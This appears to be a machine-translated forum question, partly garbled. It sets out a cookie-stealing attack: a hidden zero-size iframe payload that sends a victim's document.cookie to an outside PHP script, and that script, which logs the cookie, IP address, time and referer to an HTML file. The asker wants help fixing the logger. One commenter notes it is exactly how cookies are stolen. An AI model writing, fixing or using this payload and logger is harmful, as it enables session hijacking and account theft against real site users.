<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>
然后传递一个iframe中的document.cookie从到PHP PHP文件:在一个单独的域
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('logs.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br> <br> <br>');
fclose($fp);
header ("Location: http://www.xxx.com");
?>
logs.html
记录比cookie-为什么其他的一切吗?我测试了我的网站正在通过调用:document.cookie标签来正确显示cookie,所以其他内容已经启动。 请指出我的愚蠢!
没有CORS违规。这是_exactly_你如何窃取某人的cookie。 – Halcyon
请注意,“document.cookie”作为查询字符串的一部分传递。 – Halcyon